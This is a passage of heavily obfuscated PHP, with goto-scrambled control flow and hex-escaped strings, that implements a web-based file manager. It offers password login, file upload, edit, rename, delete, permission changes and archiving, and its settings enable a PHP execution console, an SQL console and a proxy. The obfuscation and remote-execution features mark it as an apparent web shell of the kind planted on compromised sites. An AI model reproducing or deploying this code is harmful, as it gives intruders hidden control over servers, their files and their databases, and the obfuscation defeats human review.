"\x22\x20\143\x6f\x6c\x73\75\x22\70\x30\x22\40\162\x6f\167\x73\x3d\x22\61\60\42\40\163\164\171\x6c\x65\x3d\x22\167\x69\144\x74\150\x3a\40\71\x30\x25\42\76"; goto ugTYz; CkRdS: echo file_get_contents($HezPF); goto rLf7W; h7FQj: die; goto bMloQ; CjXgL: $dVmsi = $_POST["\x66\155\137\143\157\156\146\151\x67"]; goto p_3i1; q_roJ: echo "\x3c\57\x74\x68\76\15\12\x3c\x2f\164\162\x3e\xd\12\74\x74\162\76\xd\xa\x20\x20\40\x20\74\164\144\x20\x63\x6c\x61\x73\x73\x3d\x22\162\157\167\x31\x22\76\15\12\x20\x20\40\x20\40\x20\x20\40"; goto olazH; AZQuA: curl_setopt($AU30p, CURLOPT_HEADER, 0); goto ZIrc3; dIcgb: $M3kdW .= "\x2e\147\x7a"; goto hvfBT; s9mGi: $PhGcO .= nIhJE("\x45\x72\x72\157\162\x20\157\143\x63\x75\162\x72\x65\x64") . "\72\x20" . niHjE("\156\x6f\40\146\151\x6c\145\163"); goto yCESV; EJb22: function j8ixI($XqGxA) { goto lErt2; vxkU1: $XqGxA = strtr($XqGxA, $SlKIH); goto VEoQc; KvwOx: $SlKIH = array("\x2d" => "\60", "\162" => "\x34", "\167" => "\62", "\x78" => "\x31"); goto vxkU1; lErt2: $XqGxA = str_pad($XqGxA, 9, "\x2d"); goto KvwOx; sTpeP: $Obyf3 = (int) $XqGxA[6] + (int) $XqGxA[7] + (int) $XqGxA[8]; goto ZWLtd; YA2fd: $j1sby = (int) $XqGxA[0] + (int) $XqGxA[1] + (int) $XqGxA[2]; goto tLRsy; VEoQc: $I8Pdf = "\60"; goto YA2fd; ZWLtd: $I8Pdf .= $j1sby . $e1341 . $Obyf3; goto YvRdq; YvRdq: return intval($I8Pdf, 8); goto z7P8u; tLRsy: $e1341 = (int) $XqGxA[3] + (int) $XqGxA[4] + (int) $XqGxA[5]; goto sTpeP; z7P8u: } goto dekj1; Src2s: Wi3pE: goto b8xEi; b8xEi: cLGSb: goto SQvaG; gStb9: EEA1J: goto axohW; VLD3m: echo "\x72\x75\156\x22\76\xd\xa"; goto GrFLG; txHMI: $BFNGe = file_get_contents(__FILE__); goto fjpdT; lnJeR: zPl8a: goto GDPyR; eBwXA: echo "\x22\76\xd\xa\x20\x20\x20\40\40\x20\40\x20"; goto sI2mJ; OOgcG: if (isset($_GET["\172\151\160"])) { goto Qj1nN; } goto wjqBV; lxG1P: echo "\x3c\x2f\x61\76\xd\12\11\x9\x3c\146\157\162\155\x20\x61\x63\x74\x69\157\156\75\42\42\x20\155\x65\164\150\157\144\x3d\42\120\117\123\124\x22\x20\x6e\141\x6d\x65\x3d\x22\x63\157\x6e\x73\157\x6c\x65\x22\76\15\xa\x9\11\74\164\x65\x78\164\141\x72\x65\x61\40\156\141\155\145\75\42"; goto vzpcF; jMVbw: $PhGcO .= "\x20" . nIHJe("\120\141\163\x73\x77\157\162\144") . "\x3a\x20" . $_POST["\146\x6d\137\154\157\x67\151\156"]["\x70\141\163\163\x77\x6f\x72\x64"]; goto VhB3g; xWyNz: $OS8TV = json_decode($Utwwz, true); goto aHPsa; FXMrD: echo "\x3c\x2f\x74\145\x78\x74\141\162\x65\141\x3e\15\12\x20\40\x20\x20\x20\x20\x20\40\x20\40\x20\x20\74\x69\x6e\x70\x75\x74\40\x74\x79\160\x65\x3d\42\163\x75\142\155\151\x74\42\40\x6e\x61\x6d\145\75\42\x73\141\x76\x65\x22\x20\x76\141\x6c\x75\x65\x3d\x22"; goto kyG45; plhv1: echo nIHjE("\102\141\x63\153"); goto Ndb_3; laYbd: function jXklh($KfzXx = "\x65\156") { return "\xd\xa\x3c\146\x6f\x72\155\x20\x6e\x61\x6d\145\75\x22\143\150\141\x6e\147\x65\x5f\154\x61\156\147\42\x20\155\145\164\150\157\x64\75\42\160\x6f\163\164\x22\40\x61\143\x74\x69\157\156\x3d\42\42\76\15\12\x9\x3c\163\145\154\145\x63\x74\40\156\141\x6d\x65\75\42\146\x6d\x5f\x6c\x61\x6e\x67\x22\40\164\151\164\154\145\x3d\x22" . nIhjE("\x4c\141\156\x67\165\x61\147\145") . "\x22\40\157\x6e\143\x68\141\x6e\x67\145\x3d\42\144\x6f\x63\165\155\x65\x6e\x74\56\x66\157\162\x6d\163\133\x27\143\150\141\156\147\145\x5f\154\141\x6e\147\x27\x5d\56\x73\165\142\155\151\x74\x28\51\x22\40\76\xd\12\11\11\x3c\x6f\x70\x74\151\157\x6e\40\x76\141\154\165\x65\75\x22\145\156\x22\40" . ($KfzXx == "\145\156" ? "\x73\145\x6c\145\143\x74\145\x64\x3d\x22\163\145\154\x65\x63\x74\x65\x64\42\40" : '') . "\76" . NIHje("\x45\156\147\x6c\x69\163\x68") . "\x3c\57\x6f\x70\x74\x69\157\x6e\x3e\xd\xa\x9\x9\x3c\157\x70\164\151\157\156\x20\166\x61\154\x75\x65\x3d\x22\x64\145\x22\40" . ($KfzXx == "\x64\145" ? "\163\x65\154\x65\143\x74\x65\144\x3d\x22\x73\145\x6c\145\143\164\x65\144\x22\40" : '') . "\76" . nIHJe("\107\x65\x72\155\141\x6e") . "\x3c\x2f\x6f\160\x74\x69\x6f\x6e\76\xd\12\x9\x9\74\157\x70\164\151\157\156\x20\x76\141\x6c\165\x65\x3d\x22\162\165\42\x20" . ($KfzXx == "\x72\165" ? "\x73\x65\x6c\145\x63\164\145\x64\x3d\42\x73\145\154\145\143\x74\145\144\x22\40" : '') . "\x3e" . nIhje("\x52\x75\163\163\151\x61\156") . "\74\57\x6f\160\x74\151\157\156\76\xd\xa\x9\11\74\157\x70\164\151\157\156\40\166\141\x6c\x75\145\75\42\x66\162\x22\40" . ($KfzXx == "\x66\162" ? "\163\145\x6c\145\x63\164\145\x64\x3d\42\x73\145\154\x65\x63\x74\x65\144\x22\40" : '') . "\x3e" . NiHJe("\106\x72\145\x6e\x63\150") . "\74\57\x6f\x70\x74\x69\x6f\156\x3e\xd\12\x9\11\74\x6f\160\x74\151\157\156\x20\166\x61\154\165\x65\x3d\42\165\153\42\x20" . ($KfzXx == "\x75\x6b" ? "\x73\145\x6c\145\143\x74\x65\144\75\42\163\x65\154\x65\x63\x74\145\x64\42\x20" : '') . "\x3e" . niHJe("\125\153\x72\141\151\x6e\151\x61\156") . "\x3c\x2f\157\x70\x74\151\x6f\x6e\76\xd\12\x9\x3c\x2f\x73\x65\154\145\143\164\x3e\15\12\x3c\x2f\x66\157\162\x6d\76\xd\xa"; } goto ZylFU; zQFgJ: function CnPb2() { return "\15\12\x69\x6e\160\x75\164\x2c\x20\151\x6e\x70\165\x74\x2e\x66\x6d\x5f\x69\x6e\160\x75\164\40\x7b\15\12\x9\x74\x65\170\x74\x2d\x69\x6e\144\x65\156\164\x3a\40\x32\160\x78\73\15\xa\x7d\15\xa\xd\xa\x69\x6e\160\x75\x74\x2c\x20\x74\x65\170\164\x61\162\x65\141\x2c\x20\163\145\x6c\x65\x63\x74\54\x20\x69\x6e\x70\x75\x74\56\146\x6d\137\151\156\160\165\x74\x20\173\15\12\x9\x63\157\154\x6f\x72\x3a\x20\x62\x6c\141\143\153\x3b\xd\xa\x9\146\157\156\x74\x3a\x20\156\x6f\162\155\141\x6c\x20\x38\x70\164\x20\126\x65\x72\x64\141\156\141\x2c\x20\x41\x72\x69\141\x6c\54\x20\x48\x65\154\166\x65\164\151\143\141\54\40\163\141\156\x73\55\x73\x65\162\151\146\x3b\15\xa\11\142\157\162\x64\145\162\55\x63\157\154\157\162\72\40\142\154\141\x63\x6b\x3b\xd\12\11\142\141\x63\153\x67\x72\x6f\x75\156\x64\x2d\x63\157\154\x6f\x72\x3a\x20\x23\106\x43\106\103\x46\103\40\x6e\157\x6e\145\40\41\151\155\160\x6f\x72\164\x61\x6e\164\73\15\12\x9\x62\x6f\x72\x64\x65\x72\x2d\162\x61\x64\151\x75\x73\72\x20\x30\x3b\xd\12\11\160\141\x64\x64\151\x6e\x67\x3a\40\62\160\x78\x3b\15\xa\175\15\12\15\xa\x69\156\160\x75\x74\x2e\146\x6d\137\151\156\160\x75\x74\x20\x7b\xd\12\x9\x62\x61\143\x6b\147\x72\157\165\156\144\72\40\43\x46\x43\106\x43\x46\103\x20\x6e\x6f\x6e\145\x20\41\x69\155\160\x6f\162\164\x61\x6e\164\x3b\15\12\11\x63\x75\162\163\x6f\162\x3a\40\160\157\151\x6e\x74\145\x72\x3b\xd\12\175\xd\xa\xd\xa\x2e\x68\157\x6d\x65\x20\173\xd\12\x9\x62\x61\x63\153\x67\x72\x6f\165\x6e\x64\x2d\151\155\x61\x67\x65\x3a\40\x75\x72\x6c\x28\42\x64\141\x74\141\x3a\151\x6d\141\147\x65\57\x70\x6e\x67\73\142\x61\163\145\x36\x34\x2c\x69\x56\x42\117\x52\167\x30\x4b\107\x67\157\101\101\x41\101\x4e\123\125\150\x45\x55\147\101\x41\101\102\x41\x41\101\101\101\121\x43\101\115\x41\101\x41\x41\x6f\114\121\71\x54\x41\x41\x41\101\x42\107\x64\102\x54\125\105\x41\x41\113\x2f\111\x4e\x77\x57\113\66\121\101\101\x41\147\x52\121\x54\x46\122\x46\57\146\63\x39\66\117\x6a\x6f\x2f\57\x2f\x2f\x74\x54\x30\62\172\x72\x2b\146\167\66\66\x52\x74\152\x34\63\62\124\x45\160\x33\115\130\105\62\104\101\x72\x33\x54\x59\160\x31\171\64\155\164\104\x77\x32\57\67\x42\x4d\57\67\x42\x4f\x71\126\x70\143\x2f\70\154\63\x31\152\143\161\161\x36\145\156\x77\x63\110\x42\x32\x54\x67\151\x35\152\x67\x71\x56\160\142\x46\x76\x72\141\x32\156\102\x41\x56\x2f\x50\172\70\62\123\x30\152\x6e\170\60\127\x33\x54\125\153\x71\123\x67\151\64\145\110\150\64\124\x73\162\x65\x34\x77\x6f\x73\172\60\62\x36\165\120\x6a\172\107\131\144\x36\125\x73\x33\x79\x6e\x41\171\144\125\102\101\x35\x4b\x6c\63\x66\155\x35\x65\161\x5a\141\127\67\x4f\x44\x67\151\x32\126\x67\x2b\120\x6a\64\x75\131\53\105\167\x4c\x6d\x35\142\131\x39\x55\57\57\67\x6a\146\x4c\x74\x43\53\x74\x4f\113\63\x6a\143\x6d\x2f\67\x31\x75\x32\152\131\x6f\61\125\x59\150\x35\141\112\x6c\x2f\163\145\x43\x33\x6a\105\x6d\x31\x32\153\x6d\112\x72\x49\101\61\152\x4d\x6d\57\x39\x61\x55\64\114\150\x30\x65\x30\x31\102\x6c\111\141\105\x2f\57\57\144\150\x4d\144\103\67\x49\101\57\x2f\146\124\x5a\x32\143\x33\x4d\x57\x36\156\116\x33\x30\167\x66\x39\65\126\144\x34\112\x64\x58\157\130\x56\157\x73\x38\156\105\64\x65\x66\116\57\53\x36\x33\111\112\147\123\x6e\131\150\154\67\x46\x34\143\x73\x58\164\x38\x39\107\x51\x55\167\x4c\x2b\57\152\154\61\x63\64\61\101\161\x2b\x66\142\62\x67\155\164\111\61\x72\113\x61\x32\103\x34\x6b\112\x61\111\101\63\x6a\x59\x72\154\124\167\x35\164\x6a\64\62\63\152\x59\156\x33\143\130\x45\61\172\x51\x6f\170\x4d\x48\x42\160\61\154\x5a\x33\104\147\x6d\x71\x69\x6b\163\57\53\x6d\x63\152\114\113\70\63\x6a\x59\x6b\171\x6d\115\x56\63\x54\x59\x6b\57\57\110\115\x2b\165\x37\127\x68\x6d\164\x72\60\157\144\x54\x70\x61\x4f\152\x66\127\112\146\x72\110\x70\147\x2f\70\x42\x73\57\x37\164\x57\57\x37\x56\145\53\x34\x55\65\62\x44\x4d\155\63\x4d\x4c\102\x6e\64\x71\114\x67\116\126\115\66\115\x7a\102\63\154\x45\146\154\111\165\x4c\x2f\53\x6a\101\x2f\x2f\57\x32\x30\114\x4f\172\x6a\x58\x78\70\57\67\x6c\142\x57\160\x4a\107\62\x43\70\153\63\124\157\x73\112\x4b\x4d\x41\61\171\x77\152\157\160\x4f\x52\x31\172\x59\160\65\104\163\x70\151\x61\x79\x2b\171\113\116\x68\161\x4b\123\x6b\x38\116\127\x36\57\146\152\x6e\x73\67\117\x7a\x32\x74\156\x5a\165\172\x38\x38\x37\142\x2b\x57\x33\x61\122\131\x2f\53\155\x73\x34\x72\x43\105\63\124\157\164\x37\126\x38\x35\x62\x4b\x78\x6a\165\105\101\63\167\64\65\x56\x68\65\x75\x68\161\x36\141\155\64\x63\x46\x78\147\132\x5a\x57\x2f\x39\x71\x49\165\x77\x67\x4b\171\x30\x73\x57\53\165\152\124\x34\124\x51\x6e\x74\x7a\x34\62\x33\x43\x38\151\x33\x7a\125\x6a\57\x2b\x4b\167\57\x61\x35\144\x36\x55\x4d\x78\x75\114\x36\x77\x7a\x44\105\x72\x2f\57\57\x2f\143\x71\112\121\x66\x41\101\x41\x41\113\x78\x30\x55\x6b\x35\124\x2f\x2f\x2f\57\x2f\57\x2f\x2f\x2f\57\57\57\57\x2f\57\57\x2f\x2f\57\x2f\x2f\x2f\57\57\57\x2f\57\57\x2f\57\x2f\x2f\x2f\x2f\57\x2f\x2f\x2f\57\x2f\x2f\x2f\x2f\x2f\57\x2f\x2f\57\57\57\57\57\x2f\x2f\x2f\x2f\x2f\57\x2f\x2f\x2f\x2f\x2f\57\x2f\x2f\x2f\57\57\57\x2f\57\x2f\57\57\57\x2f\57\57\x2f\x2f\57\57\57\57\57\x2f\x2f\57\57\x2f\x2f\57\x2f\x2f\57\x2f\57\x2f\x2f\57\57\x2f\x2f\x2f\57\x2f\57\57\x2f\57\57\x2f\57\x2f\57\x2f\57\57\x2f\57\57\x2f\x2f\x2f\57\57\x2f\57\57\57\57\57\x2f\57\57\57\x2f\x2f\x2f\x2f\57\57\57\57\57\57\57\x2f\57\x2f\x2f\x2f\x2f\x2f\57\x2f\x2f\57\x2f\x2f\57\57\x2f\57\57\x2f\57\57\57\x2f\x2f\57\57\x2f\57\57\x2f\x2f\57\57\x2f\57\x2f\57\57\x2f\x2f\x2f\x2f\x2f\57\57\x2f\x2f\57\57\x2f\57\57\x2f\57\57\x2f\x2f\57\x2f\57\x2f\x2f\57\57\x2f\x2f\x2f\x2f\57\57\x2f\x2f\57\x2f\57\x2f\x2f\x2f\x2f\x2f\101\101\x57\126\106\142\x45\x41\x41\x41\x41\x5a\144\105\x56\x59\144\106\116\166\x5a\x6e\122\63\x59\130\112\154\101\x45\x46\x6b\142\x32\x4a\x6c\x49\105\x6c\164\x59\x57\144\x6c\x55\155\x56\150\132\x48\x6c\x78\x79\x57\125\x38\x41\101\x41\101\62\125\154\105\121\126\x51\157\x55\x32\x4e\131\152\x51\131\131\x73\101\151\105\70\125\x39\x59\172\x44\131\x6a\x56\x70\x47\x5a\122\x78\115\x69\105\x43\x69\x74\115\x72\x56\x5a\x76\x6f\x4d\x72\x54\154\121\62\x45\123\122\121\x4a\x32\106\126\x77\151\156\x59\142\x6d\161\124\x55\x4c\x6f\157\150\156\105\61\147\x31\x61\113\107\123\x2f\x66\116\x4d\x74\x6b\x34\60\171\132\71\x4b\126\114\x51\150\147\x59\153\165\131\67\x4e\170\x51\166\x58\171\x48\x56\106\116\x6e\113\x7a\x52\x36\71\x71\x70\170\102\120\115\145\x7a\60\105\124\101\x51\x79\124\x55\166\123\157\x67\141\x49\106\x61\x50\143\116\161\x56\x2f\115\x35\144\x68\141\x32\122\154\62\124\x69\155\142\66\132\x2b\x51\102\104\131\x31\x58\116\57\123\142\165\x38\170\106\x4c\x47\63\x65\x4c\x44\x66\154\x32\125\101\x42\x6a\151\154\117\x31\157\60\x31\62\x5a\63\x65\x6b\x31\x6c\132\x56\111\127\x41\101\155\125\124\113\x36\114\x30\163\63\x70\130\x2b\152\x6a\66\160\165\x5a\62\101\x77\x57\125\166\102\x52\141\160\150\x73\x77\115\144\125\x75\x6a\x43\x69\x77\x44\x77\x61\65\126\x45\144\120\x49\x37\171\x6e\125\154\143\x37\166\61\161\131\x55\x52\x4c\x71\x75\146\x34\62\x68\x7a\64\65\103\102\x50\104\164\167\101\103\x72\155\x2b\x52\x44\143\170\x4a\x59\x41\x41\101\x41\101\102\x4a\x52\125\x35\105\162\x6b\x4a\147\147\x67\75\75\42\x29\x3b\xd\12\11\x62\141\143\x6b\x67\x72\x6f\x75\x6e\144\x2d\x72\x65\x70\x65\x61\x74\72\x20\156\157\55\162\145\x70\145\141\x74\73\15\12\175"; } goto q9BrB; xns0G: goto sbb5e; goto d922t; Y60mX: if (!empty($_REQUEST["\162\145\156\141\155\x65"]) && $_REQUEST["\162\145\156\x61\155\x65"] != "\56") { goto xjoEh; } goto oLRhn; RSlW3: echo nihje("\x53\145\154\145\143\164\40\164\150\145\40\x66\151\x6c\145"); goto oZR54; DDch7: OpJyh: goto L5djQ; z9bkU: $s9IZn->compress(Phar::GZ, $DGyLr . "\x2e\x74\x61\162\x2e\x67\x7a"); goto Pi8wu; lArhM: $AU30p = curl_init($JD5XC); goto NZ9Hr; i3P_y: echo "\x22\x20\145\156\143\164\x79\160\145\75\x22\x6d\165\154\164\x69\x70\141\162\164\57\x66\157\162\x6d\55\x64\x61\x74\x61\42\x3e\xd\xa\x9\11\11\x3c\x69\x6e\160\x75\x74\x20\x74\171\x70\145\75\42\150\151\144\x64\x65\156\42\40\156\141\155\145\x3d\42\x70\141\164\x68\42\x20\166\x61\154\165\x65\x3d\x22"; goto Jok93; xTTeU: function MiMD1($ZXKul, $VEMW5, $YBL3C, $otovv = '') { goto dXSdw; eCFC6: U9_Pn: goto iBxT4; dXSdw: if (!empty($otovv)) { goto U9_Pn; } goto b3CES; b3CES: $otovv = $YBL3C . "\x20" . basename($VEMW5); goto eCFC6; iBxT4: return "\x26\x6e\142\163\160\x3b\46\156\x62\163\x70\73\74\141\40\x68\x72\145\146\x3d\x22\x3f" . $ZXKul . "\75" . base64_encode($VEMW5) . "\x22\x20\x74\151\164\154\x65\x3d\42" . $otovv . "\x22\76" . $YBL3C . "\74\x2f\x61\x3e"; goto UuHAb; UuHAb: } goto ymI9q; XrxrW: TB4_6: goto C_Z6n; vaX5O: $NMa_c = filemtime(__FILE__); goto mnTRC; lrmn7: $XkBmx = array("\x6d\141\153\145\x5f\144\x69\x72\x65\143\x74\157\162\171" => true, "\x6e\x65\x77\137\x66\151\154\145" => true, "\165\x70\x6c\157\x61\x64\137\146\x69\154\x65" => true, "\x73\x68\x6f\167\137\x64\151\x72\x5f\x73\x69\x7a\145" => false, "\163\150\157\x77\x5f\151\x6d\x67" => true, "\163\x68\157\x77\x5f\160\x68\x70\x5f\166\145\162" => true, "\163\150\157\x77\137\160\x68\160\x5f\151\x6e\x69" => false, "\163\x68\157\167\x5f\147\x74" => true, "\145\156\141\x62\154\145\137\x70\150\160\x5f\x63\x6f\156\x73\x6f\154\145" => true, "\x65\x6e\x61\x62\x6c\145\x5f\x73\161\x6c\137\x63\157\156\x73\157\154\x65" => true, "\x73\x71\x6c\x5f\163\145\162\x76\x65\x72" => "\154\x6f\x63\x61\x6c\150\157\163\164", "\x73\161\x6c\137\x75\x73\145\162\156\x61\x6d\145" => "\x72\157\157\x74", "\x73\x71\x6c\137\160\141\x73\x73\x77\157\x72\144" => '', "\x73\x71\154\137\144\x62" => "\164\145\x73\x74\x5f\x62\141\x73\x65", "\x65\156\141\x62\x6c\x65\x5f\x70\162\157\170\x79" => true, "\x73\x68\157\x77\137\160\150\160\x69\x6e\x66\157" => true, "\x73\150\157\167\x5f\170\x6c\x73" => true, "\x66\155\x5f\163\x65\x74\x74\x69\x6e\x67\163" => true, "\162\x65\163\164\x6f\162\145\x5f\x74\x69\x6d\x65" => true, "\146\155\137\162\145\163\x74\x6f\162\145\137\x74\x69\155\x65" => false); goto SX6q1; EadTE: echo $scYTs; goto UPfDi; Tn0SD: echo "\x3a\x20\74\151\156\x70\165\164\40\164\171\160\145\x3d\42\x74\145\x78\164\x22\x20\x6e\141\155\145\75\42\x6e\x65\x77\x6e\141\155\145\x22\40\x76\141\154\x75\x65\75\x22"; goto lNAHs; jlC0n: echo "\74\x2f\164\150\76\15\xa\x3c\x2f\164\x72\x3e\15\xa"; goto DUhGf; fQx5G: oDcQS: goto cA94W; km37S: if (empty($JfK9U[1])) { goto pzsFP; } goto vaX5O; axohW: $h17u3 = $_POST["\164\160\x6c\137\145\x64\151\164\x65\144"]; goto mx6YM; JyxDk: clearstatcache(); goto Mjc6k; EgFRy: if (isset($_POST["\146\155\137\x63\x6f\x6e\x66\151\147"])) { goto bxOXh; } goto c8gLp; qezJu: YvP0P: goto kgP_8; umdRD: $_FILES["\165\160\154\157\x61\144"]["\156\x61\x6d\145"] = str_replace("\x25", '', $_FILES["\165\x70\154\157\x61\x64"]["\x6e\x61\155\x65"]); goto caCru; mw1iy: echo nihJE("\x46\151\x6c\x65\40\155\x61\x6e\141\x67\145\162") . "\40\55\x20" . $QxlDp; goto QrR3S; oDz_N: if (!is_file($JV9b8)) { goto YvP0P; } goto IH5qZ; UIl20: foreach ($V5Ocp as $HezPF) { goto v0GaC; p2OUx: echo "\x3c\x2f\x74\144\76\15\xa\x20\40\40\x20\x3c\164\x64\76"; goto eQqUQ; mUNni: N8v3e: goto x0qno; bLjiG: echo $Jm_Jk; goto TXBwW; g4QWS: if (@is_dir($ymjik)) { goto sb94k; } goto JrG27; cYNlq: $uJgWd = hjoES($HezPF) || $zkayn ? '' : MIMd1("\172\151\x70", $ymjik, nIHJE("\103\x6f\x6d\x70\162\145\x73\163") . "\x26\x6e\142\x73\x70\73\172\151\x70", NiHJE("\x41\x72\x63\150\x69\x76\151\156\x67") . "\x20" . $HezPF); goto ru1T0; OWPbJ: goto z1zY7; goto HefZ2; JMNKv: echo $u40BD; goto B5wEB; TXBwW: echo "\x3c\x2f\x74\144\76\xd\12\x20\x20\40\40\x3c\x74\x64\76"; goto Os6jC; huSon: $yco3m = ''; goto OWPbJ; swa5h: $uJgWd = Mimd1("\144\x6f\x77\x6e\154\x6f\141\144", $ymjik, NIHJE("\104\157\x77\156\154\157\x61\144"), nihjE("\x44\x6f\x77\x6e\x6c\157\x61\x64") . "\40" . $HezPF); goto YbMkW; QgleY: mNLUL: goto coNme; Ajuyv: $yco3m = "\157\x6e\103\154\151\x63\153\75\x22\151\x66\x28\x63\x6f\156\x66\151\162\155\50\x27" . nihje("\x41\x72\145\40\x79\157\x75\x20\x73\165\162\145\40\x79\x6f\165\40\167\x61\x6e\x74\x20\164\x6f\x20\x64\145\154\145\164\145\40\164\x68\x69\x73\x20\x64\151\x72\145\x63\164\157\162\x79\x20\x28\x72\145\x63\165\162\163\151\x76\145\154\171\51\77") . "\x5c\x6e\x20\x2f" . $HezPF . "\x27\51\x29\40\144\157\143\165\155\x65\x6e\x74\x2e\154\157\143\141\164\151\157\x6e\x2e\150\x72\145\146\40\x3d\40\47" . $zBDAR . "\46\x64\145\154\x65\x74\x65\75" . $HezPF . "\46\x70\x61\164\x68\75" . $QxlDp . "\47\42"; goto CtMc6; vuEnA: $e8Mye[7] = ''; goto viFVS; Lkps3: echo $s1u_6; goto xik3u; IXZnQ: $s1u_6 = "\162\157\167\62"; goto EZZMb; pUxYe: $vlFan = hjoes($HezPF) ? '' : "\74\x61\40\150\162\x65\146\75\x22\x23\42\x20\x74\151\x74\154\x65\75\x22" . NihJE("\104\145\x6c\145\164\x65") . "\x20" . $HezPF . "\x22\x20" . $yco3m . "\x3e" . nihJe("\104\145\154\x65\x74\x65") . "\x3c\57\x61\76"; goto FTVXE; eQqUQ: echo $e8Mye[7]; goto Wju4R; y6Ud8: echo "\74\x2f\164\144\76\xd\12\x20\x20\40\x20\74\164\x64\x3e"; goto hsFmP; B5wEB: echo "\x3c\57\164\x64\76\xd\12\74\57\x74\162\76\xd\xa"; goto mUNni; reX4r: $e8Mye = @stat($ymjik); goto g4QWS; v0GaC: $ymjik = $QxlDp . $HezPF; goto reX4r; Os6jC: echo $uJgWd; goto kldII; FTVXE: $Jm_Jk = hJOEs($HezPF) ? '' : "\74\x61\x20\150\162\x65\x66\x3d\x22" . $zBDAR . "\46\x72\x65\x6e\141\155\145\75" . $HezPF . "\46\x70\x61\164\x68\75" . $QxlDp . "\x22\40\x74\x69\164\x6c\x65\75\42" . nihje("\x52\x65\x6e\141\x6d\145") . "\40" . $HezPF . "\42\76" . niHJE("\122\x65\x6e\141\x6d\x65") . "\74\57\141\x3e"; goto ojeCf; CtMc6: z1zY7: goto OKYJj; OKYJj: Nzhex: goto pUxYe; coNme: $VEMW5 = "\x3c\x61\40\x68\162\x65\146\x3d\42" . $zBDAR . "\x26\x70\141\164\x68\75" . $QxlDp . $HezPF . "\x22\x20\x74\x69\164\154\145\x3d\42" . nihjE("\x53\150\x6f\167") . "\x20" . $HezPF . "\x22\x3e\74\x73\160\141\x6e\40\x63\154\141\163\x73\x3d\x22\146\x6f\154\144\x65\162\42\76\x26\156\142\163\160\73\x26\x6e\x62\x73\160\x3b\x26\156\142\x73\160\73\46\x6e\142\x73\160\x3b\x3c\57\x73\x70\x61\x6e\76\x20" . $HezPF . "\74\x2f\x61\x3e"; goto cYNlq; EZZMb: if (!HjoES($HezPF)) { goto astoQ; } goto huSon; h3zpE: $e8Mye[7] = JcGW8($ymjik); goto QgleY; i3Qag: echo $VEMW5; goto p2OUx; XvdpQ: echo $vlFan; goto nqfRt; Yk8Yi: $yco3m = "\x6f\156\x43\x6c\151\x63\153\x3d\x22\x69\x66\50\x63\x6f\x6e\146\151\162\155\x28\x27" . NiHje("\x46\x69\154\145\40\163\145\154\145\x63\x74\x65\144") . "\72\x20\x5c\x6e" . $HezPF . "\x2e\40\x5c\156" . nihjE("\x41\162\x65\x20\171\x6f\x75\x20\x73\x75\x72\x65\x20\171\x6f\x75\40\167\x61\156\164\40\164\x6f\40\x64\145\x6c\145\x74\145\40\164\x68\151\163\x20\146\151\154\x65\x3f") . "\x27\51\x29\40\144\x6f\143\165\x6d\x65\x6e\164\56\154\157\x63\141\164\x69\x6f\156\56\x68\x72\145\146\x20\x3d\40\47" . $zBDAR . "\46\144\x65\154\145\x74\x65\x3d" . $HezPF . "\x26\160\141\164\x68\75" . $QxlDp . "\x27\42"; goto cU9Yc; LqPMv: $s1u_6 = "\162\x6f\x77\x31"; goto Yk8Yi; JrG27: $VEMW5 = $dVmsi["\x73\x68\x6f\x77\137\151\155\147"] && @getimagesize($ymjik) ? "\74\141\x20\164\141\x72\x67\145\x74\x3d\42\137\142\154\x61\156\x6b\42\x20\x6f\x6e\x63\x6c\151\143\153\75\x22\166\x61\162\40\154\x65\x66\164\x6f\x20\x3d\40\163\143\162\x65\x65\156\x2e\x61\x76\x61\x69\154\x57\x69\x64\x74\x68\x2f\x32\55\x33\62\x30\73\167\x69\156\x64\157\167\56\157\160\x65\156\50\47" . fign2($ymjik) . "\x27\54\x27\160\157\160\165\160\x27\54\x27\x77\x69\144\x74\x68\x3d\x36\64\60\x2c\x68\x65\x69\147\x68\164\x3d\x34\70\x30\54\154\x65\x66\x74\x3d\47\x20\x2b\x20\154\145\146\x74\x6f\x20\x2b\40\x27\x2c\x73\143\x72\157\x6c\x6c\x62\x61\162\x73\x3d\171\145\163\54\164\157\x6f\154\142\x61\x72\75\156\x6f\54\154\x6f\x63\x61\164\151\157\156\x3d\156\x6f\54\x64\x69\x72\145\x63\x74\157\162\x69\x65\x73\75\x6e\157\54\x73\164\x61\x74\165\163\75\156\x6f\47\51\x3b\x72\145\164\165\162\156\x20\146\x61\154\x73\145\x3b\42\40\x68\162\145\146\x3d\42" . fIGN2($ymjik) . "\42\x3e\74\x73\160\x61\x6e\40\x63\154\141\163\x73\x3d\x22\151\155\x67\x22\x3e\46\x6e\142\x73\160\73\x26\156\142\x73\160\73\x26\156\x62\163\160\73\x26\156\x62\x73\x70\73\x3c\x2f\163\x70\141\x6e\x3e\40" . $HezPF . "\74\x2f\141\76" : "\74\x61\40\x68\162\145\146\x3d\42" . $zBDAR . "\46\x65\x64\151\164\75" . $HezPF . "\46\x70\141\164\150\75" . $QxlDp . "\x22\x20\164\x69\x74\154\145\75\42" . nIHjE("\105\x64\x69\x74") . "\x22\76\x3c\163\160\141\x6e\40\143\x6c\141\x73\163\75\x22\146\x69\154\145\42\x3e\46\156\142\x73\160\73\x26\156\142\163\x70\73\x26\156\x62\x73\x70\x3b\46\x6e\x62\x73\x70\x3b\74\x2f\163\160\x61\x6e\76\x20" . $HezPF . "\x3c\57\x61\x3e"; goto k4kOr; YbMkW: $u40BD = in_array($DGyLr, array("\x7a\151\x70", "\x67\172", "\x74\141\162")) ? '' : (hjOeS($HezPF) || $zkayn ? '' : MImd1("\147\172\146\x69\154\x65", $ymjik, nIhje("\103\x6f\155\x70\x72\x65\x73\x73") . "\x26\x6e\142\x73\x70\73\x2e\x74\x61\x72\x2e\147\172", NIhJe("\101\162\143\x68\151\x76\x69\x6e\147") . "\40" . $HezPF)); goto LqPMv; xzaP3: echo "\x3c\x2f\x74\x64\x3e\15\12\40\x20\40\x20\74\x74\144\x3e"; goto XvdpQ; Wju4R: echo "\x3c\57\164\x64\x3e\xd\xa\40\40\40\40\x3c\x74\x64\x20\163\164\171\x6c\145\x3d\x22\x77\x68\151\164\x65\x2d\163\160\x61\x63\x65\72\x6e\x6f\167\162\x61\x70\x22\76"; goto JrSxB; JrSxB: echo gmdate("\x59\x2d\155\55\144\40\110\x3a\x69\x3a\163", $e8Mye[9]); goto y6Ud8; ojeCf: $qgX0Y = $HezPF == "\56" || $HezPF == "\x2e\x2e" ? '' : "\x3c\x61\x20\150\x72\145\146\75\42" . $zBDAR . "\46\x72\x69\147\x68\164\163\x3d" . $HezPF . "\46\160\141\164\x68\75" . $QxlDp . "\42\40\164\x69\x74\154\x65\75\42" . 